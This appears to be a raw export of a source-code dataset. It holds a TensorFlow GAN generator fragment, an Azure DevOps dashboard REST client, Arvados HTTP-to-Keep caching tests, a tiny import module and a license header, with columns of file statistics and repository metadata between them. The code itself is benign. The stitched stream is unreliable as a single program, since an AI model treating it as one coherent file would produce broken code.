                    z = tf.concat([z, y], 1)
                    z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
                    h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
                    h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
                    h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
                    h0 = self._conv_cond_concat(h0, yb)
                    h1 = self._deconv2d(h0, 64 * 4, name='g_dconv0')
                    h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
                    h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
                    h1 = self._conv_cond_concat(h1, yb)
                    h2 = self._deconv2d(h1, 64 * 2, name='g_dconv1')
                    h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
                    h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
                    h2 = self._conv_cond_concat(h2, yb)
                    h3 = self._deconv2d(h2, 64 * 1, name='g_dconv2')
                    h3 = self._batch_norm_contrib(h3, 'g_bn3', train=True)
                    h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
                    h3 = self._conv_cond_concat(h3, yb)
                    h4 = self._deconv2d(h3, 3, name='g_dconv3')
                    h4 = tf.nn.tanh(h4)
                    ## [64, 64]
                    return h4
# Module is import-only; there is no standalone entry point yet.
if __name__ == "__main__":
    pass
| 46.857143
| 116
| 0.473276
| 2,721
| 20,992
| 3.422639
| 0.060272
| 0.0262
| 0.060024
| 0.092344
| 0.901965
| 0.875013
| 0.856545
| 0.850532
| 0.8326
| 0.817674
| 0
| 0.076166
| 0.404583
| 20,992
| 448
| 117
| 46.857143
| 0.668934
| 0.067073
| 0
| 0.81962
| 0
| 0
| 0.059399
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018987
| false
| 0.006329
| 0.009494
| 0
| 0.082278
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6508705806dd8a9df7750b2fb3390baad4a94dcd
| 19,297
|
py
|
Python
|
vsts/vsts/dashboard/v4_0/dashboard_client.py
|
kenkuo/azure-devops-python-api
|
9e920bd25e938fa89ff7f60153e5b9e113ca839d
|
[
"MIT"
] | null | null | null |
vsts/vsts/dashboard/v4_0/dashboard_client.py
|
kenkuo/azure-devops-python-api
|
9e920bd25e938fa89ff7f60153e5b9e113ca839d
|
[
"MIT"
] | null | null | null |
vsts/vsts/dashboard/v4_0/dashboard_client.py
|
kenkuo/azure-devops-python-api
|
9e920bd25e938fa89ff7f60153e5b9e113ca839d
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...vss_client import VssClient
from . import models
class DashboardClient(VssClient):
"""Dashboard
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(DashboardClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '31c84e0a-3ece-48fd-a29d-100849af99ba'
def create_dashboard(self, dashboard, team_context):
"""CreateDashboard.
[Preview API]
:param :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>` dashboard:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
content = self._serialize.body(dashboard, 'Dashboard')
response = self._send(http_method='POST',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Dashboard', response)
def delete_dashboard(self, team_context, dashboard_id):
"""DeleteDashboard.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
self._send(http_method='DELETE',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values)
def get_dashboard(self, team_context, dashboard_id):
"""GetDashboard.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
response = self._send(http_method='GET',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values)
return self._deserialize('Dashboard', response)
def get_dashboards(self, team_context):
"""GetDashboards.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<DashboardGroup> <dashboard.v4_0.models.DashboardGroup>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
response = self._send(http_method='GET',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values)
return self._deserialize('DashboardGroup', response)
def replace_dashboard(self, dashboard, team_context, dashboard_id):
"""ReplaceDashboard.
[Preview API]
:param :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>` dashboard:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
content = self._serialize.body(dashboard, 'Dashboard')
response = self._send(http_method='PUT',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Dashboard', response)
def replace_dashboards(self, group, team_context):
"""ReplaceDashboards.
[Preview API]
:param :class:`<DashboardGroup> <dashboard.v4_0.models.DashboardGroup>` group:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<DashboardGroup> <dashboard.v4_0.models.DashboardGroup>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
content = self._serialize.body(group, 'DashboardGroup')
response = self._send(http_method='PUT',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('DashboardGroup', response)
def create_widget(self, widget, team_context, dashboard_id):
"""CreateWidget.
[Preview API]
:param :class:`<Widget> <dashboard.v4_0.models.Widget>` widget:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
content = self._serialize.body(widget, 'Widget')
response = self._send(http_method='POST',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Widget', response)
def delete_widget(self, team_context, dashboard_id, widget_id):
"""DeleteWidget.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:param str widget_id:
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
response = self._send(http_method='DELETE',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='4.0-preview.2',
route_values=route_values)
return self._deserialize('Dashboard', response)
def get_widget(self, team_context, dashboard_id, widget_id):
    """GetWidget.
    [Preview API] Retrieves a single widget from a dashboard.
    :param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
    :param str dashboard_id:
    :param str widget_id:
    :rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
    """
    project = None
    team = None
    if team_context is not None:
        # Prefer the stable id over the display name when both are set.
        project = team_context.project_id or team_context.project
        team = team_context.team_id or team_context.team
    # (route key, serializer parameter name, value, serializer type)
    route_specs = (('project', 'project', project, 'string'),
                   ('team', 'team', team, 'string'),
                   ('dashboardId', 'dashboard_id', dashboard_id, 'str'),
                   ('widgetId', 'widget_id', widget_id, 'str'))
    route_values = {}
    for route_key, param_name, value, value_type in route_specs:
        if value is not None:
            route_values[route_key] = self._serialize.url(param_name, value, value_type)
    response = self._send(http_method='GET',
                          location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
                          version='4.0-preview.2',
                          route_values=route_values)
    return self._deserialize('Widget', response)
def replace_widget(self, widget, team_context, dashboard_id, widget_id):
    """ReplaceWidget.
    [Preview API] Replaces (PUT) the widget identified by widget_id with the supplied widget.
    :param :class:`<Widget> <dashboard.v4_0.models.Widget>` widget:
    :param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
    :param str dashboard_id:
    :param str widget_id:
    :rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
    """
    project = None
    team = None
    if team_context is not None:
        # Prefer the stable id over the display name when both are set.
        project = team_context.project_id or team_context.project
        team = team_context.team_id or team_context.team
    # (route key, serializer parameter name, value, serializer type)
    route_specs = (('project', 'project', project, 'string'),
                   ('team', 'team', team, 'string'),
                   ('dashboardId', 'dashboard_id', dashboard_id, 'str'),
                   ('widgetId', 'widget_id', widget_id, 'str'))
    route_values = {}
    for route_key, param_name, value, value_type in route_specs:
        if value is not None:
            route_values[route_key] = self._serialize.url(param_name, value, value_type)
    content = self._serialize.body(widget, 'Widget')
    response = self._send(http_method='PUT',
                          location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
                          version='4.0-preview.2',
                          route_values=route_values,
                          content=content)
    return self._deserialize('Widget', response)
def update_widget(self, widget, team_context, dashboard_id, widget_id):
    """UpdateWidget.
    [Preview API] Applies a partial update (PATCH) to the widget identified by widget_id.
    :param :class:`<Widget> <dashboard.v4_0.models.Widget>` widget:
    :param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
    :param str dashboard_id:
    :param str widget_id:
    :rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
    """
    project = None
    team = None
    if team_context is not None:
        # Prefer the stable id over the display name when both are set.
        project = team_context.project_id or team_context.project
        team = team_context.team_id or team_context.team
    # (route key, serializer parameter name, value, serializer type)
    route_specs = (('project', 'project', project, 'string'),
                   ('team', 'team', team, 'string'),
                   ('dashboardId', 'dashboard_id', dashboard_id, 'str'),
                   ('widgetId', 'widget_id', widget_id, 'str'))
    route_values = {}
    for route_key, param_name, value, value_type in route_specs:
        if value is not None:
            route_values[route_key] = self._serialize.url(param_name, value, value_type)
    content = self._serialize.body(widget, 'Widget')
    response = self._send(http_method='PATCH',
                          location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
                          version='4.0-preview.2',
                          route_values=route_values,
                          content=content)
    return self._deserialize('Widget', response)
def get_widget_metadata(self, contribution_id):
    """GetWidgetMetadata.
    [Preview API] Fetches metadata for the widget identified by its contribution id.
    :param str contribution_id:
    :rtype: :class:`<WidgetMetadataResponse> <dashboard.v4_0.models.WidgetMetadataResponse>`
    """
    if contribution_id is None:
        route_values = {}
    else:
        route_values = {
            'contributionId': self._serialize.url('contribution_id', contribution_id, 'str'),
        }
    response = self._send(http_method='GET',
                          location_id='6b3628d3-e96f-4fc7-b176-50240b03b515',
                          version='4.0-preview.1',
                          route_values=route_values)
    return self._deserialize('WidgetMetadataResponse', response)
def get_widget_types(self, scope):
    """GetWidgetTypes.
    [Preview API] Returns available widgets in alphabetical order.
    :param str scope:
    :rtype: :class:`<WidgetTypesResponse> <dashboard.v4_0.models.WidgetTypesResponse>`
    """
    if scope is None:
        query_parameters = {}
    else:
        query_parameters = {
            '$scope': self._serialize.query('scope', scope, 'str'),
        }
    response = self._send(http_method='GET',
                          location_id='6b3628d3-e96f-4fc7-b176-50240b03b515',
                          version='4.0-preview.1',
                          query_parameters=query_parameters)
    return self._deserialize('WidgetTypesResponse', response)
| 44.981352
| 122
| 0.577033
| 2,054
| 19,297
| 5.205453
| 0.078384
| 0.113169
| 0.039562
| 0.045829
| 0.853348
| 0.847175
| 0.832305
| 0.817153
| 0.808642
| 0.800037
| 0
| 0.030467
| 0.309426
| 19,297
| 428
| 123
| 45.086449
| 0.771875
| 0.20143
| 0
| 0.885246
| 0
| 0
| 0.109055
| 0.035651
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045902
| false
| 0
| 0.009836
| 0
| 0.101639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
650b5f0598514bbe9fd5ea0de96ab848d2375ad0
| 10,825
|
py
|
Python
|
sdk/cwl/tests/test_http.py
|
rpatil524/arvados
|
c89213f5a5e303050caaebe4f8fdf2980fc65605
|
[
"ECL-2.0",
"Apache-2.0"
] | 222
|
2015-01-02T17:24:54.000Z
|
2019-11-27T06:31:51.000Z
|
sdk/cwl/tests/test_http.py
|
rpatil524/arvados
|
c89213f5a5e303050caaebe4f8fdf2980fc65605
|
[
"ECL-2.0",
"Apache-2.0"
] | 62
|
2015-03-12T20:22:06.000Z
|
2019-12-04T18:35:35.000Z
|
sdk/cwl/tests/test_http.py
|
rpatil524/arvados
|
c89213f5a5e303050caaebe4f8fdf2980fc65605
|
[
"ECL-2.0",
"Apache-2.0"
] | 75
|
2015-01-22T21:20:50.000Z
|
2019-12-03T08:52:23.000Z
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from future import standard_library
standard_library.install_aliases()
import copy
import io
import functools
import hashlib
import json
import logging
import mock
import sys
import unittest
import datetime
import arvados
import arvados.collection
import arvados_cwl
import arvados_cwl.runner
import arvados.keep
from .matcher import JsonDiffMatcher, StripYAMLComments
from .mock_discovery import get_rootDesc
import arvados_cwl.http
import ruamel.yaml as yaml
class TestHttpToKeep(unittest.TestCase):
    """Unit tests for arvados_cwl.http.http_to_keep.

    Every test mocks requests.get / requests.head and the arvados
    collection classes, so no network or Keep access occurs.
    NOTE: mock.patch decorators apply bottom-up, so the innermost
    decorator supplies the first mock argument after self.
    """

    @mock.patch("requests.get")
    @mock.patch("arvados.collection.Collection")
    def test_http_get(self, collectionmock, getmock):
        """Uncached URL is downloaded and its Date header recorded on the collection."""
        api = mock.MagicMock()
        # Empty items list: no collection already caches this URL.
        api.collections().list().execute.return_value = {
            "items": []
        }
        cm = mock.MagicMock()
        cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
        cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
        collectionmock.return_value = cm
        req = mock.MagicMock()
        req.status_code = 200
        req.headers = {}
        req.iter_content.return_value = ["abc"]
        getmock.return_value = req
        utcnow = mock.MagicMock()
        utcnow.return_value = datetime.datetime(2018, 5, 15)
        r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
        self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
        getmock.assert_called_with("http://example.com/file1.txt", stream=True, allow_redirects=True)
        cm.open.assert_called_with("file1.txt", "wb")
        cm.save_new.assert_called_with(name="Downloaded from http%3A%2F%2Fexample.com%2Ffile1.txt",
                                       owner_uuid=None, ensure_unique_name=True)
        api.collections().update.assert_has_calls([
            mock.call(uuid=cm.manifest_locator(),
                      body={"collection":{"properties": {'http://example.com/file1.txt': {'Date': 'Tue, 15 May 2018 00:00:00 GMT'}}}})
        ])

    @mock.patch("requests.get")
    @mock.patch("arvados.collection.CollectionReader")
    def test_http_expires(self, collectionmock, getmock):
        """Cached URL with a still-future Expires header is served from Keep with no HTTP request."""
        api = mock.MagicMock()
        api.collections().list().execute.return_value = {
            "items": [{
                "uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
                "portable_data_hash": "99999999999999999999999999999998+99",
                "properties": {
                    'http://example.com/file1.txt': {
                        'Date': 'Tue, 15 May 2018 00:00:00 GMT',
                        'Expires': 'Tue, 17 May 2018 00:00:00 GMT'
                    }
                }
            }]
        }
        cm = mock.MagicMock()
        cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
        cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
        cm.keys.return_value = ["file1.txt"]
        collectionmock.return_value = cm
        req = mock.MagicMock()
        req.status_code = 200
        req.headers = {}
        req.iter_content.return_value = ["abc"]
        getmock.return_value = req
        utcnow = mock.MagicMock()
        # "now" (May 16) precedes Expires (May 17), so the cache is fresh.
        utcnow.return_value = datetime.datetime(2018, 5, 16)
        r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
        self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
        getmock.assert_not_called()

    @mock.patch("requests.get")
    @mock.patch("arvados.collection.CollectionReader")
    def test_http_cache_control(self, collectionmock, getmock):
        """Cached URL within its Cache-Control max-age window triggers no HTTP request."""
        api = mock.MagicMock()
        api.collections().list().execute.return_value = {
            "items": [{
                "uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
                "portable_data_hash": "99999999999999999999999999999998+99",
                "properties": {
                    'http://example.com/file1.txt': {
                        'Date': 'Tue, 15 May 2018 00:00:00 GMT',
                        # 172800 s = 2 days: cache is valid through May 17.
                        'Cache-Control': 'max-age=172800'
                    }
                }
            }]
        }
        cm = mock.MagicMock()
        cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
        cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
        cm.keys.return_value = ["file1.txt"]
        collectionmock.return_value = cm
        req = mock.MagicMock()
        req.status_code = 200
        req.headers = {}
        req.iter_content.return_value = ["abc"]
        getmock.return_value = req
        utcnow = mock.MagicMock()
        utcnow.return_value = datetime.datetime(2018, 5, 16)
        r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
        self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
        getmock.assert_not_called()

    @mock.patch("requests.get")
    @mock.patch("requests.head")
    @mock.patch("arvados.collection.Collection")
    def test_http_expired(self, collectionmock, headmock, getmock):
        """Expired cache entry is re-downloaded into a new collection (note the new PDH)."""
        api = mock.MagicMock()
        api.collections().list().execute.return_value = {
            "items": [{
                "uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
                "portable_data_hash": "99999999999999999999999999999998+99",
                "properties": {
                    'http://example.com/file1.txt': {
                        'Date': 'Tue, 15 May 2018 00:00:00 GMT',
                        'Expires': 'Tue, 16 May 2018 00:00:00 GMT'
                    }
                }
            }]
        }
        cm = mock.MagicMock()
        # Fresh collection with a different locator/hash than the stale one above.
        cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz4"
        cm.portable_data_hash.return_value = "99999999999999999999999999999997+99"
        cm.keys.return_value = ["file1.txt"]
        collectionmock.return_value = cm
        req = mock.MagicMock()
        req.status_code = 200
        req.headers = {'Date': 'Tue, 17 May 2018 00:00:00 GMT'}
        req.iter_content.return_value = ["def"]
        getmock.return_value = req
        headmock.return_value = req
        utcnow = mock.MagicMock()
        # "now" (May 17) is past Expires (May 16): the entry is stale.
        utcnow.return_value = datetime.datetime(2018, 5, 17)
        r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
        self.assertEqual(r, "keep:99999999999999999999999999999997+99/file1.txt")
        getmock.assert_called_with("http://example.com/file1.txt", stream=True, allow_redirects=True)
        cm.open.assert_called_with("file1.txt", "wb")
        cm.save_new.assert_called_with(name="Downloaded from http%3A%2F%2Fexample.com%2Ffile1.txt",
                                       owner_uuid=None, ensure_unique_name=True)
        api.collections().update.assert_has_calls([
            mock.call(uuid=cm.manifest_locator(),
                      body={"collection":{"properties": {'http://example.com/file1.txt': {'Date': 'Tue, 17 May 2018 00:00:00 GMT'}}}})
        ])

    @mock.patch("requests.get")
    @mock.patch("requests.head")
    @mock.patch("arvados.collection.CollectionReader")
    def test_http_etag(self, collectionmock, headmock, getmock):
        """Stale entry revalidated by HEAD: matching ETag skips the download and refreshes cached headers."""
        api = mock.MagicMock()
        api.collections().list().execute.return_value = {
            "items": [{
                "uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
                "portable_data_hash": "99999999999999999999999999999998+99",
                "properties": {
                    'http://example.com/file1.txt': {
                        'Date': 'Tue, 15 May 2018 00:00:00 GMT',
                        'Expires': 'Tue, 16 May 2018 00:00:00 GMT',
                        'ETag': '123456'
                    }
                }
            }]
        }
        cm = mock.MagicMock()
        cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
        cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
        cm.keys.return_value = ["file1.txt"]
        collectionmock.return_value = cm
        req = mock.MagicMock()
        req.status_code = 200
        # HEAD response carries the same ETag, so the cached copy is still valid.
        req.headers = {
            'Date': 'Tue, 17 May 2018 00:00:00 GMT',
            'Expires': 'Tue, 19 May 2018 00:00:00 GMT',
            'ETag': '123456'
        }
        headmock.return_value = req
        utcnow = mock.MagicMock()
        utcnow.return_value = datetime.datetime(2018, 5, 17)
        r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
        self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
        getmock.assert_not_called()
        cm.open.assert_not_called()
        api.collections().update.assert_has_calls([
            mock.call(uuid=cm.manifest_locator(),
                      body={"collection":{"properties": {'http://example.com/file1.txt': {
                          'Date': 'Tue, 17 May 2018 00:00:00 GMT',
                          'Expires': 'Tue, 19 May 2018 00:00:00 GMT',
                          'ETag': '123456'
                      }}}})
        ])

    @mock.patch("requests.get")
    @mock.patch("arvados.collection.Collection")
    def test_http_content_disp(self, collectionmock, getmock):
        """Filename is taken from the Content-Disposition header rather than the URL."""
        api = mock.MagicMock()
        api.collections().list().execute.return_value = {
            "items": []
        }
        cm = mock.MagicMock()
        cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
        cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
        collectionmock.return_value = cm
        req = mock.MagicMock()
        req.status_code = 200
        req.headers = {"Content-Disposition": "attachment; filename=file1.txt"}
        req.iter_content.return_value = ["abc"]
        getmock.return_value = req
        utcnow = mock.MagicMock()
        utcnow.return_value = datetime.datetime(2018, 5, 15)
        r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/download?fn=/file1.txt", utcnow=utcnow)
        self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
        getmock.assert_called_with("http://example.com/download?fn=/file1.txt", stream=True, allow_redirects=True)
        cm.open.assert_called_with("file1.txt", "wb")
        cm.save_new.assert_called_with(name="Downloaded from http%3A%2F%2Fexample.com%2Fdownload%3Ffn%3D%2Ffile1.txt",
                                       owner_uuid=None, ensure_unique_name=True)
        api.collections().update.assert_has_calls([
            mock.call(uuid=cm.manifest_locator(),
                      body={"collection":{"properties": {"http://example.com/download?fn=/file1.txt": {'Date': 'Tue, 15 May 2018 00:00:00 GMT'}}}})
        ])
| 37.327586
| 147
| 0.603695
| 1,187
| 10,825
| 5.357203
| 0.129739
| 0.079572
| 0.037427
| 0.025947
| 0.881742
| 0.877811
| 0.873251
| 0.868533
| 0.859097
| 0.859097
| 0
| 0.113668
| 0.269376
| 10,825
| 289
| 148
| 37.456747
| 0.690353
| 0.008406
| 0
| 0.72
| 0
| 0.004444
| 0.264492
| 0.115471
| 0
| 0
| 0
| 0
| 0.102222
| 1
| 0.026667
| false
| 0
| 0.088889
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
689a155ea464ee88088a610359b6dae4284d2c07
| 42
|
py
|
Python
|
server/jio.py
|
simon816/Project-Awesomeness
|
ab7f156dd62cbdfe8b85d0372688d9bd2c6cf952
|
[
"MIT"
] | 1
|
2019-05-25T16:28:25.000Z
|
2019-05-25T16:28:25.000Z
|
server/jio.py
|
simon816/Project-Awesomeness
|
ab7f156dd62cbdfe8b85d0372688d9bd2c6cf952
|
[
"MIT"
] | null | null | null |
server/jio.py
|
simon816/Project-Awesomeness
|
ab7f156dd62cbdfe8b85d0372688d9bd2c6cf952
|
[
"MIT"
] | null | null | null |
from io_in import *
from io_out import *
| 10.5
| 20
| 0.738095
| 8
| 42
| 3.625
| 0.625
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 42
| 3
| 21
| 14
| 0.878788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7de36332a2c00ab6f6e1bbd3190cb4576d532a7
| 14,152
|
py
|
Python
|
freezer-api-7.1.0/freezer_api/tests/unit/sqlalchemy/v2/test_client.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 22
|
2015-10-18T02:53:47.000Z
|
2021-09-19T10:38:12.000Z
|
freezer-api-7.1.0/freezer_api/tests/unit/sqlalchemy/v2/test_client.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
freezer-api-7.1.0/freezer_api/tests/unit/sqlalchemy/v2/test_client.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 20
|
2016-03-08T08:34:56.000Z
|
2020-10-13T06:50:05.000Z
|
# (c) Copyright 2018 ZTE Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
